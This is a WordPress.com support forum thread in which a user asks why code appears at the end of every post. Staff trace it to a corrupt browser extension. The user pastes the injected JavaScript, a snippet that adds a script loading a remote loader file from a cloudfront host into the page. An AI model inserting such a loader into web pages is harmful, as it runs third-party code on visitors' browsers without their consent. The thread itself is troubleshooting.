Annoying code appearing at the end of every posting

  • Author
    Posts
  • #945263

    uhoh112
    Member

    Long line of html code appear in my post. Even if I only write one word I’ll have 3 long lines of code. How do I stop this from happening – this is the reason why I stopped using my wordpress account.
    Blog url: http://deematas.wordpress.com/

    The blog I need help with is deematas.wordpress.com.

    #945462

    raincoaster
    Member

    The reason it’s appearing is you’ve enabled some browser add-on which is adding the code. Disable all your add-ons and make a test post. Then add them back one by one, updating the post each time, to see which one is responsible.

    #945633

    uhoh112
    Member

    No that doesn’t work at all.

    #945634

    timethief
    Member

    Please post the code you are seeing here.

    #945636

    uhoh112
    Member

    Here’s what it says:

    // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    any other ideas?

    #945637

    timethief
    Member

    This thread has been flagged for Staff attention.

    #945638

    macmanx
    Staff

    Please try disabling all of your browser add-ons and plugins, then edit the post.

    One of them is corrupt and adding the code.

    #945640

    uhoh112
    Member

    Thanks, for your help I had to disable all the extensions to find the problem – but it seems if I turn any extensions back on the code returns.

    #945641

    macmanx
    Staff

    Yes, the extension that results with the code re-appearing needs to be deleted.

The topic ‘Annoying code appearing at the end of every posting’ is closed to new replies.